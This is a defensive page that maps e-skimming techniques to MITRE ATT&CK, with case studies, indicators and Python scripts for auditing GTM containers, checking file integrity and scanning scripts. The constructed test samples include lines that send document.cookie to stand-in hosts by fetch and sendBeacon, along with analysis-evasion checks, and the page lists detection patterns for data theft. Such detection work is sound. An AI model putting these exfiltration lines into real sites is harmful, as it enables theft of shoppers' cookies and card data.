MITRE ATT&CK Matrix for E-Skimming

v1.0

Comprehensive framework for understanding, detecting, and defending against e-skimming attacks

Understanding E-Skimming Attack Patterns

E-skimming attacks have caused billions in damages and affected millions of customers worldwide. This framework provides comprehensive analysis of attack techniques, tactics, and procedures used by threat actors to compromise e-commerce platforms.

Key figures:

  • 380K British Airways victims
  • £20M ICO fine (British Airways)
  • 11K+ sites compromised (CosmicSting)
  • 13+ Magecart groups active

Overview

Document Information
Version 2.0 | Last Updated: 2025-10-21
Target Environment: Web applications, e-commerce platforms, payment processing systems
Updates: Added 33 new techniques including GTM hijacking, NPM supply chain attacks, steganography, and annotation system

This document presents a customized MITRE ATT&CK matrix specifically designed for e-skimming (web skimming, formjacking, Magecart) attacks. Based on extensive research and analysis of real-world e-skimming campaigns, this matrix maps attack techniques, tactics, and procedures (TTPs) used by threat actors to compromise e-commerce platforms and steal payment card data.


MITRE ATT&CK Matrix for E-Skimming

Annotation System: Techniques are marked with status badges to indicate their prevalence:
🔴 Observed = Documented in real-world attacks with published IOCs or incident reports
🟡 Emerging = Security research, PoCs, or logical evolution of existing techniques
🔵 Lab-Only = Demonstrated in controlled lab environments for educational purposes
Initial Access
  • T1190 Exploit Public-Facing Application [🔴 Observed]
  • T1078 Valid Accounts [🔴 Observed]
  • T1195 Supply Chain Compromise [🔴 Observed]
  • T1195.002 Compromise Software Dependencies (NPM Sept 2025) [🔴 Observed]
  • CUSTOM Google Tag Manager Hijacking [🔴 Observed]

Execution
  • T1059.007 JavaScript Execution

Persistence
  • T1554 Compromise Client Software [🔴 Observed]
  • T1176 Browser Extensions [🔴 Observed]
  • CUSTOM GTM Container Poisoning [🔴 Observed]
  • CUSTOM Service Worker Man-in-the-Middle [🟡 Emerging]

Privilege Escalation
  • T1068 Exploitation for Privilege Escalation [🔴 Observed]
  • T1548.002 Bypass UAC / Weak Admin Auth [🔴 Observed]
  • CUSTOM Web App Role Escalation [🟡 Emerging]

Defense Evasion
  • T1027 Obfuscated Files or Information [🔴 Observed]
  • T1027.003 Steganography (CSS, EXIF, PNG, Favicon) [🔴 Observed]
  • T1622 Debugger Evasion [🔴 Observed]
  • T1480 Execution Guardrails [🔴 Observed]
  • T1480.001 Geofencing [🔴 Observed]
  • T1036 Masquerading [🔴 Observed]
  • T1497.001 VM/Sandbox Evasion (WebGL) [🔴 Observed]
  • CUSTOM Canvas Fingerprinting Evasion [🔴 Observed]
  • CUSTOM CSP Bypass via Google Analytics [🔴 Observed]
  • CUSTOM Timing-Based Evasion [🟡 Emerging]
  • CUSTOM Shadow DOM Hiding [🟡 Emerging]

Credential Access
  • T1003 OS Credential Dumping [🔴 Observed]
  • T1552.001 Unsecured Credentials (.env files) [🔴 Observed]
  • T1555.003 Browser Saved Credentials [🔴 Observed]
  • CUSTOM Credential Management API Hooking [🟡 Emerging]

Discovery
  • T1083 File and Directory Discovery [🔴 Observed]
  • T1082 System Info Discovery (Fingerprinting) [🔴 Observed]
  • T1614 System Location Discovery (Geolocation) [🔴 Observed]
  • T1010 Application Window Discovery (DevTools) [🔴 Observed]
  • CUSTOM Payment Form Discovery [🔴 Observed]
  • T1497 Virtualization/Sandbox Evasion [🔴 Observed]

Lateral Movement
  • No techniques commonly used in e-skimming attacks

Collection
  • T1056 Input Capture [🔴 Observed]
  • T1056.001 Keylogging [🔴 Observed]
  • T1056.002 GUI Input Capture [🔴 Observed]
  • T1005 Data from Local System [🔴 Observed]
  • CUSTOM DOM Manipulation (MutationObserver) [🔴 Observed]
  • CUSTOM Payment Request API Manipulation [🔴 Observed]
  • CUSTOM LocalStorage Scraping [🔴 Observed]

Command and Control
  • T1071 Web Service [🔴 Observed]

Exfiltration
  • T1041 Exfiltration Over C2 Channel [🔴 Observed]
  • CUSTOM WebSocket Exfiltration [🔴 Observed]
  • CUSTOM Image-Based Exfiltration [🔴 Observed]
  • CUSTOM DNS Tunneling [🟡 Emerging]

Impact
  • T1491.001 Internal Defacement (Fake Forms) [🔴 Observed]
  • T1496 Resource Hijacking (Cryptojacking) [🔴 Observed]
  • T1657 Financial Theft [🔴 Observed]
  • T1565.002 Transmitted Data Manipulation [🟡 Emerging]
  • T1499 Endpoint Denial of Service [🟡 Emerging]

MITRE ATT&CK Tactics and Techniques

TA0001: Initial Access

The techniques used by attackers to gain initial entry into the target e-commerce infrastructure.

T1190

Exploit Public-Facing Application

Exploitation of vulnerabilities in e-commerce platforms to gain access.

Key Example: CVE-2024-34102 (CosmicSting) - XXE vulnerability in Adobe Commerce/Magento 2.4.7 with CVSS 9.8/10
Impact: 3x increase in Magecart infections (11,000+ domains in 2024)
Detection: WAF logs, unusual HTTP requests, XXE entity expansion
T1078

Valid Accounts (Stolen Credentials)

Use of stolen or compromised credentials to access e-commerce admin panels.

Examples: British Airways (2018), Newegg (2018)
Method: Phishing, info-stealer malware, credential stuffing
Detection: Unusual login times/locations, VPN usage, off-hours access
T1195

Supply Chain Compromise

Manipulation of third-party services, libraries, or dependencies to inject malicious code.

Examples: Ticketmaster (Inbenta chatbot - 40K victims), Forbes (fontsawesome.gq)
Targets: CDN providers, analytics services, chat widgets, browser extensions
Detection: SRI hash mismatches, CSP violations, unexpected script changes
CUSTOM 🔴 Observed

Google Tag Manager Hijacking

Compromising GTM containers to inject persistent skimmers that bypass traditional security controls.

2025 Campaign: 316 stores compromised, 88,000 victims, average 3.5 months persistence
Method: Phishing GTM admin credentials → Inject Base64-encoded skimmer in GTM container → Persistent across pages
Evasion: Security tools whitelist GTM, skip container scanning. Backdoor in media/index.php for re-infection
Detection: GTM container audits, Base64 in GTM tags, network requests from GTM to non-Google domains
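As an added illustration of the "GTM container audits" detection above (example code written for this page, not part of the original matrix or of any Google tooling), the following Python walks a GTM container export and flags Custom HTML tags that carry base64 blobs, atob()/eval() calls, or URLs pointing at non-Google hosts, decoding the blobs so a host hidden inside one is caught as well. The export layout (containerVersion.tag[].parameter[] with an "html" parameter on Custom HTML tags) and the sample container are assumptions constructed for the example.

```python
import base64
import json
import re
from urllib.parse import urlparse

GOOGLE_HOSTS = ("googletagmanager.com", "google-analytics.com", "google.com")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long base64-looking runs
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def is_google_host(host):
    return any(host == h or host.endswith("." + h) for h in GOOGLE_HOSTS)

def decode_blobs(text):
    """Best-effort decode of base64 runs so URLs hidden inside them get scanned too."""
    out = []
    for blob in B64_BLOB.findall(text):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "ignore"))
        except ValueError:  # not real base64 (e.g. a long minified identifier)
            pass
    return out

def audit_gtm_export(export_json):
    """Flag Custom HTML tags carrying base64 blobs, atob()/eval(), or non-Google hosts."""
    findings = []
    for tag in json.loads(export_json)["containerVersion"].get("tag", []):
        if tag.get("type") != "html":  # built-in tag templates carry no free-form script
            continue
        html = next((p["value"] for p in tag.get("parameter", []) if p.get("key") == "html"), "")
        blobs = decode_blobs(html)
        reasons = ["base64 blob"] if blobs else []
        if re.search(r"\b(?:atob|eval)\s*\(", html):
            reasons.append("atob/eval")
        hosts = {urlparse(u).hostname for u in URL_RE.findall(" ".join([html] + blobs))}
        external = sorted(h for h in hosts if h and not is_google_host(h))
        if external:
            reasons.append("non-Google hosts: " + ", ".join(external))
        if reasons:
            findings.append((tag["name"], reasons))
    return findings

# Constructed sample in the shape of a GTM container export (assumed layout:
# containerVersion.tag[].parameter[] with key "html" on Custom HTML tags).
HIDDEN = base64.b64encode(b"fetch('https://cdn-stats.example.invalid/c?d='+btoa(document.cookie))").decode()
SAMPLE_EXPORT = json.dumps({"containerVersion": {"publicId": "GTM-EXAMPLE", "tag": [
    {"name": "Consent helper", "type": "html", "parameter": [{"key": "html", "value":
        "<script>var s=document.createElement('script');s.src="
        "'https://www.googletagmanager.com/gtag/js';document.head.appendChild(s);</script>"}]},
    {"name": "Pixel", "type": "html", "parameter": [{"key": "html", "value":
        "<script>eval(atob('" + HIDDEN + "'))</script>"}]},
]}})
```

Run it against a real export taken from the GTM admin UI; the Consent helper tag stays quiet because its only host is Google's, while the Pixel tag is reported on all three counts.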
T1195.002 🔴 Observed

NPM Supply Chain Attack (September 2025)

Sophisticated attack on the NPM ecosystem, affecting packages with 2 billion combined weekly downloads.

Attack Vector: Phishing + MITM 2FA theft of Josh Junon (Qix) account
Compromised: 20 packages: chalk, debug, ansi-styles, supports-color, strip-ansi + 15 more
Payload: Crypto wallet hijacking (ETH, BTC, SOL, TRX, LTC, BCH) targeting web contexts
Duration: 2.5 hours exposure (September 8, 2025)
Detection: Package.json monitoring, SRI for npm packages, post-install script auditing
T1027.003 🔴 Observed

Steganography Techniques

Hiding malicious code in image metadata, CSS files, and favicons to bypass detection.

CSS Steganography: Malicious code hidden in CSS file comments, extracted via obfuscated JS
EXIF Metadata: Skimmer in JPEG "Copyright" field (Segway 2022: 600K visitors affected)
PNG LSB: Code hidden in PNG least significant bits, alpha channel
Favicon Alpha: 512 bytes in 64x64 ICO transparency layer (2024 academic research)
Detection: EXIF metadata scanning (ExifTool), CSS entropy analysis, statistical LSB detection

TA0002: Execution

Techniques used to run malicious code on the victim's browser or server.

TA0003: Persistence

Techniques to maintain access and continue operations over extended periods.

T1554

File Modification (Compromise Client Software)

Modification of legitimate JavaScript files to include skimmer code.

Example: British Airways - 22 lines appended to Modernizr library (15 days, 380K victims)
Duration: Average 47 days undetected, range 2 weeks to 6 months
Detection: File integrity monitoring (FIM), git diff alerts, code review
T1176

Browser Extensions

Use of malicious or compromised browser extensions for persistent access.

Examples: DataSpii, Great Suspender, crypto wallet extensions
Capabilities: Cross-site access, bypass same-origin policy, persistent across sessions
Detection: Excessive permissions, unexpected updates, network traffic from background scripts

TA0005: Defense Evasion

Techniques to avoid detection by security tools and analysts.

T1027

Obfuscated Files or Information

Code obfuscation to evade detection and analysis.

Techniques: Base64 encoding, multi-layer encoding, obfuscator.io, dead code injection
Examples: Kritec skimmer, Gateway skimmer (multiple layers)
Detection: High entropy, eval() with encoded args, static analysis tools
T1622

Debugger Evasion

Anti-debugging techniques to prevent security analysis.

Methods: Firebug detection, debugger statements, timing attacks, console override
Example: Gateway skimmer checks for Firebug/DevTools
T1480

Execution Guardrails (Geofencing)

Conditional execution based on environment to evade detection.

Techniques: Country filtering, VPN detection, browser fingerprinting, VM detection (WebGL)
Detection: Environment checks, geolocation API usage, WebGL renderer queries
T1036

Masquerading

Disguising malicious code as legitimate services or libraries.

Methods: GTM disguise, analytics domains, 404 page hiding, image steganography
Example: Segway (2022) - 600K+ records via image-hidden code
CUSTOM 🔴 Observed

CSP Bypass via Google Analytics

Exfiltrating stolen data through attacker-controlled Google Analytics accounts to bypass CSP restrictions.

Campaign: March 2024 Magecart campaign targeting several dozen e-commerce sites
Method: Encode stolen card data → Send to attacker's GA dashboard via legitimate GA endpoints
Bypass: Site CSPs routinely allowlist Google Analytics domains, so exfiltration to the attacker's own GA property passes as legitimate analytics traffic
Detection: GA measurement ID validation, unexpected GA traffic patterns, data encoding in GA events
T1497.001 🔴 Observed

VM/Sandbox Evasion (WebGL Detection)

Detecting analysis environments via WebGL renderer queries to avoid security researchers.

Technique: Query WebGL renderer for "swiftshader", "llvmpipe", "virtualbox" signatures
Examples: Advanced Magecart variants, Gateway skimmer
Impact: Skimmer only executes on real victim browsers, skips analysis VMs
Detection: Monitor WebGL API calls, renderer string queries, environment fingerprinting

TA0009: Collection

Techniques to gather payment card data and personal information from victims.

T1005

Data from Local System

Collection of data stored locally in browser storage.

Targets: localStorage, sessionStorage, cookies, IndexedDB
Example: Multi-form Magecart collecting data across multiple pages

TA0010: Exfiltration

Techniques to transmit stolen payment data to attacker-controlled infrastructure.


Detection & Mitigation Matrix

Attack Stage    | Detection Method                                    | Tools                                                | Indicators
Initial Access  | Log monitoring, WAF                                 | SIEM, WAF, access reviews                            | Unusual admin access, exploit attempts
Execution       | CSP violations, script analysis                     | Browser DevTools, Semgrep, AI analysis               | Unexpected scripts, CSP reports
Persistence     | SDLC integrity checks, CDN/WAF injection monitoring | OSSEC, Tripwire                                      | File modifications, unauthorized changes
Defense Evasion | Static analysis, deobfuscation, selective execution | de4js, JsDeObsBench, js-beautify, script analysis    | High entropy, eval(), obfuscation, detection of analysis tools/environment
Collection      | Runtime monitoring, event analysis                  | Custom scripts, extensions                           | Unexpected form access, input listeners, form overlay
Exfiltration    | 3rd-party key/ID monitor, CSP report-only           | CSP report-only custom monitor, HAR change detection | New domains, especially typo-squatted ones

Defense Strategies

Preventive

Content Security Policy (CSP)

Restrict script sources and block unauthorized scripts.

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com; connect-src 'self'; report-uri /csp-report

Deliver the policy as an HTTP response header rather than in a <meta> element: report-uri is ignored when CSP is set via <meta>, so the violation reports the Detection & Mitigation matrix relies on would never reach /csp-report. Because default-src 'self' is the fallback for img-src and the other fetch directives, image-based exfiltration is blocked along with fetch/XHR, WebSocket and sendBeacon traffic (all governed by connect-src). Roll the same policy out as Content-Security-Policy-Report-Only first to surface the legitimate third parties that still need allowlisting.
Mitigates: Unauthorized script execution, inline scripts
Preventive

Subresource Integrity (SRI)

Cryptographic hash verification for external scripts.

<script src="https://cdn.example.com/lib.js"
        integrity="sha384-oqVuAfXRKap7..."
        crossorigin="anonymous"></script>
Mitigates: CDN compromise, unauthorized script modifications
Preventive

Multi-Factor Authentication (MFA)

Prevent credential-based compromise of admin accounts.

Mitigates: Stolen credentials, phishing, credential stuffing
Required: All admin accounts, developer access, production systems
Detective

File Integrity Monitoring (FIM)

Detect unauthorized file modifications in real-time.

Tools: OSSEC, Tripwire, AIDE
Coverage: All production JavaScript, HTML, CSS files
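Added example (not from the original page) tying the SRI and FIM controls together: it derives the integrity value for the bytes actually served, verifies a fetched copy against a (possibly multi-hash) integrity attribute, and, when a production file no longer matches its release baseline, reports the lines that were added, which is how a handful of lines appended to a vendor library (the British Airways pattern under T1554) surfaces. The baseline and tampered scripts are constructed inputs.

```python
import base64
import difflib
import hashlib

SRI_ALGOS = ("sha256", "sha384", "sha512")  # the only digests browsers accept in integrity=

def sri_hash(data, algo="sha384"):
    """Build an integrity value ("sha384-<base64 digest>") for the exact bytes served."""
    if algo not in SRI_ALGOS:
        raise ValueError("unsupported SRI algorithm: " + algo)
    return algo + "-" + base64.b64encode(hashlib.new(algo, data).digest()).decode()

def sri_matches(data, integrity):
    """True if the bytes match any token of a (possibly multi-hash) integrity attribute."""
    for token in integrity.split():
        algo = token.split("-", 1)[0]
        if algo in SRI_ALGOS and sri_hash(data, algo) == token:
            return True
    return False

def check_file(name, baseline_text, current_text):
    """FIM-style check: re-hash the deployed file against its release baseline and, on a
    mismatch, report exactly which lines were added (an appended skimmer shows up here)."""
    baseline, current = baseline_text.encode(), current_text.encode()
    expected = sri_hash(baseline)
    if sri_matches(current, expected):
        return {"file": name, "changed": False}
    diff = difflib.unified_diff(baseline_text.splitlines(), current_text.splitlines(), lineterm="", n=0)
    added = [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]
    return {"file": name, "changed": True, "expected": expected,
            "actual": sri_hash(current), "added_lines": added}

# Constructed sample: a release baseline and the same file with one line appended after deploy.
BASELINE_JS = "/* vendor feature-detect lib */\nwindow.Modernizr = {touch: true};\n"
TAMPERED_JS = BASELINE_JS + "document.forms[0].addEventListener('submit', onSubmit); // not in release\n"
```

Store the expected values at build time (they are the same strings you put in the integrity attribute) and have the FIM job re-run check_file against what the CDN actually serves, not only against the origin filesystem.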
Detective

Network Monitoring

Monitor all outbound traffic from checkout pages.

Tools: Suricata, Snort, Zeek
Alerts: Requests to unknown/suspicious domains
Detective

Behavioral Monitoring

Monitor form field access patterns and event listeners.

// Monitor unauthorized form access (install before any third-party script loads)
const valueDesc = Object.getOwnPropertyDescriptor(HTMLInputElement.prototype, 'value');
const isPaymentField = el => /card|cvv|cvc|expir/i.test(el.name + ' ' + el.autocomplete);
// Heuristic assumed for this snippet: only the first-party checkout bundle may read payment fields
const isAuthorized = () => /\/checkout\.js/.test(new Error().stack || '');
Object.defineProperty(HTMLInputElement.prototype, 'value', {
    configurable: true,
    get: function() {
        if (isPaymentField(this) && !isAuthorized()) {
            console.trace('Unauthorized access!');   // forward to your SIEM here
        }
        return valueDesc.get.call(this);
    },
    set: function(v) { valueDesc.set.call(this, v); }   // keep writes working
});

Real-World Case Studies

British Airways (August 2018)
Attack Chain: Initial Access (T1078) → Execution (T1059.007) → Persistence (T1554) → Collection (T1056.002) → Exfiltration (T1041)

Details: Stolen admin credentials (no MFA) → Modified Modernizr library → 22-line skimmer → Form submission interception → HTTP POST to baways.com

Impact: 380,000 victims | 15 days undetected | £20M ICO fine

Detection Failure: No FIM, no behavioral monitoring, discovered via customer fraud reports
Ticketmaster (June 2018)
Attack Chain: Supply Chain Compromise (T1195.002) → Execution (T1059.007) → Collection (T1056) → Exfiltration (T1041)

Details: Compromised Inbenta chatbot third-party service → Malicious code in chatbot script

Impact: 40,000 victims | £1.25M fine

Key Lesson: Third-party scripts require SRI and CSP controls
CosmicSting / CVE-2024-34102 (2024)
Attack Chain: Exploit Vulnerability (T1190) → Execution → Persistence

Details: XXE vulnerability in Adobe Commerce/Magento 2.4.7 (CVSS 9.8) → Remote code execution → Skimmer installation

Impact: 3x increase in Magecart infections | 11,000+ domains compromised

Detection: WAF rules for XXE, unusual XML requests, file system changes
Google Tag Manager Hijacking Campaign (2025)
Attack Chain: Stolen Credentials (T1078) → GTM Container Poisoning (CUSTOM) → Persistence → Defense Evasion (T1036) → Collection (T1056) → Exfiltration (T1041)

Details: Phishing GTM admin accounts → Inject Base64-encoded skimmer in GTM container (GTM-MLHK2N68) → Backdoor in media/index.php → 3.5 months average persistence

Impact: 316 stores compromised | 88,000 victims | Evasion via GTM whitelisting

Key Lesson: GTM containers require security audits, Base64 detection, and tag approval workflows
NPM Supply Chain Attack (September 2025)
Attack Chain: Supply Chain Compromise (T1195.002) → Credential Theft → Execution

Details: Phishing + MITM 2FA theft of Josh Junon (Qix) → Compromised 20 packages (chalk, debug, ansi-styles, etc.) → Crypto wallet hijacking payload

Impact: 2 billion weekly downloads affected | 2.5 hours exposure | Targets ETH, BTC, SOL, TRX, LTC, BCH wallets

Detection Failure: No runtime package verification, post-install scripts executed without review

Indicators of Compromise (IOCs)

Network Indicators

  • Newly registered domains (< 30 days)
  • Bulletproof hosting providers
  • Typosquatting domains (baways.com, fontsawesome.gq)
  • POST requests from checkout to unknown domains
  • WebSocket connections to non-legitimate endpoints
  • Large URL parameters on image requests
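Added example, not from the original page: triage for CSP report-only violation reports implementing the "new domains, especially typo-squatted ones" check from the Detection & Mitigation matrix and the network indicators above. Hosts outside the allowlist are flagged, data-carrying directives on the checkout page raise the severity, and the registrable label is compared by edit distance against the vendors actually in use so that fontsawesome.gq is tied to fontawesome.com. The allowlist and the reports are constructed; the label extraction is a deliberate simplification with no public-suffix lookup.

```python
import json
from urllib.parse import urlparse

ALLOWED_HOSTS = {"shop.example", "cdn.fontawesome.com", "www.googletagmanager.com"}  # constructed

def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registrable_label(host):
    # Crude: second-to-last DNS label ("fontsawesome" for fontsawesome.gq); no PSL lookup.
    parts = host.split(".")
    return parts[-2] if len(parts) >= 2 else host

def lookalike_of(host):
    label = registrable_label(host)
    for allowed in sorted(ALLOWED_HOSTS):  # allowed host within edit distance 2, if any
        if 0 < levenshtein(label, registrable_label(allowed)) <= 2:
            return allowed
    return None

def triage(report_json):
    """Classify one report-uri style CSP report; None means the host is already expected."""
    r = json.loads(report_json)["csp-report"]
    host = urlparse(r.get("blocked-uri", "")).hostname
    if not host or host in ALLOWED_HOSTS or any(host.endswith("." + a) for a in ALLOWED_HOSTS):
        return None  # known host (a policy gap, not an incident) or a non-URL value like "inline"
    directive = (r.get("violated-directive", "").split() or [""])[0]
    on_checkout = "checkout" in urlparse(r.get("document-uri", "")).path
    # Directives that can carry data off the checkout page are the exfiltration paths that matter.
    severity = "high" if on_checkout and directive in {"connect-src", "form-action", "img-src"} else "medium"
    reasons = ["host not in allowlist"]
    twin = lookalike_of(host)
    if twin:
        reasons.append("look-alike of " + twin)
        severity = "high"
    return {"host": host, "directive": directive, "severity": severity, "reasons": reasons}

# Constructed CSP violation reports in the report-uri JSON shape ({"csp-report": {...}}).
SAMPLE_REPORTS = [
    json.dumps({"csp-report": {"document-uri": "https://shop.example/checkout",
                "violated-directive": "connect-src", "blocked-uri": "https://baways.com/gateway/app"}}),
    json.dumps({"csp-report": {"document-uri": "https://shop.example/product/42",
                "violated-directive": "script-src", "blocked-uri": "https://fontsawesome.gq/kit.js"}}),
]
```

Feed it from the endpoint named in report-uri and add a domain-age lookup where you have one; a newly registered host scoring "high" here is the case the list above describes.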

Host Indicators

  • Modified JavaScript files outside deploy windows
  • Unexpected event listeners on payment forms
  • localStorage/sessionStorage with payment field names
  • Browser extensions with excessive permissions
  • File hash mismatches for production scripts

Code Indicators

  • eval(atob(...)) patterns
  • High-entropy variable names (_0x1a2b3c)
  • Payment field CSS selectors
  • Debugger detection code
  • Environment fingerprinting (WebGL queries)
  • Fetch/XHR to non-payment-processor domains
High-Risk Patterns to Monitor:

  • querySelector('[name*="card"]') in unknown scripts
  • document.cookie enumeration on checkout pages
  • new WebSocket() on payment forms
  • navigator.sendBeacon() with form data
  • Multiple encoding layers (Base64 + hex + custom)
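Added example (not code from the original page): a static triage scanner that turns the code indicators and high-risk patterns listed above, together with the high-entropy and eval()-with-encoded-argument signals under T1027, into weighted regex rules plus a Shannon entropy check on long string literals. The rules, weights and both sample scripts are constructed for this page; the suspicious sample consists only of the listed fragments.

```python
import math
import re
from collections import Counter

# Regex rules for the code indicators listed above (constructed for this example).
RULES = [
    ("eval_of_decoded", re.compile(r"\beval\s*\(\s*(?:atob|unescape|decodeURIComponent)\s*\(")),
    ("nested_encoding", re.compile(r"\batob\s*\([^)]*(?:unescape|decodeURIComponent|fromCharCode)")),
    ("hex_identifiers", re.compile(r"\b_0x[0-9a-f]{4,}\b")),
    ("payment_selector", re.compile(r"querySelector(?:All)?\([^)]*(?:card|cvv|cvc|expir)", re.I)),
    ("cookie_enum", re.compile(r"document\.cookie\b")),
    ("websocket", re.compile(r"\bnew\s+WebSocket\s*\(")),
    ("send_beacon", re.compile(r"navigator\.sendBeacon\s*\(")),
    ("analysis_env_check", re.compile(r"\bdebugger\b|Firebug|devtools|HeadlessChrome|UNMASKED_RENDERER_WEBGL", re.I)),
]
WEIGHTS = {"eval_of_decoded": 3, "nested_encoding": 3, "payment_selector": 3, "hex_identifiers": 2,
           "websocket": 2, "send_beacon": 2, "high_entropy_literal": 2}  # everything else weighs 1
STRING_LIT = re.compile(r"'([^'\\\n]{32,})'|\"([^\"\\\n]{32,})\"")

def shannon_entropy(s):
    """Bits per character; packed or encoded payloads sit well above ordinary source text."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def scan_script(src, entropy_threshold=4.5):
    """Return {indicator: count} for every rule that fires on the script source."""
    hits = {name: len(rx.findall(src)) for name, rx in RULES if rx.search(src)}
    literals = [a or b for a, b in STRING_LIT.findall(src)]
    dense = [s for s in literals if shannon_entropy(s) >= entropy_threshold]
    if dense:
        hits["high_entropy_literal"] = len(dense)
    return hits

def risk_score(hits):
    return sum(WEIGHTS.get(name, 1) for name in hits)

# Constructed samples: an ordinary tag-manager helper and a script made only of the
# indicator fragments listed above (fragments, not a working skimmer).
BENIGN = """
document.querySelector('#newsletter-email').addEventListener('change', function (e) {
  window.dataLayer.push({event: 'newsletter_signup', value: e.target.value.length});
});
"""
SUSPICIOUS = """
var _0x3f2a = ['c2VuZA==', 'Y2FyZA=='];
var f = document.querySelector('[name*="card"]');
if (window.Firebug || navigator.userAgent.indexOf('HeadlessChrome') > -1) { f = null; }
navigator.sendBeacon('https://stats-collector.example.invalid/p', btoa(document.cookie));
eval(atob('dmFyIGEgPSAxOyB2YXIgYiA9IDI7IHZhciBjID0gMzsgdmFyIGQgPSA0Ow=='));
"""
```

Run scan_script over every script a checkout page loads (a HAR export is a convenient source) and review anything whose risk_score crosses the threshold you set on a baseline of your own legitimate scripts.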

Recommendations

For E-Commerce Platforms

  • Defense in Depth: CSP + SRI + FIM + Network Monitoring (no single control is sufficient)
  • Enforce MFA: All admin accounts require multi-factor authentication
  • Third-Party Risk: Vendor assessments, SRI for external scripts, regular audits
  • Continuous Monitoring: Real-time FIM alerts, network anomaly detection, checkout page monitoring
  • Incident Response: Documented procedures, regular drills, forensic readiness

For Security Teams

  • Threat Hunting: Regular code reviews, network traffic baselining, event listener inventory
  • Detection Engineering: Custom Semgrep rules, Suricata signatures, behavioral monitoring
  • Training: Developer secure coding, incident response drills, e-skimming TTP education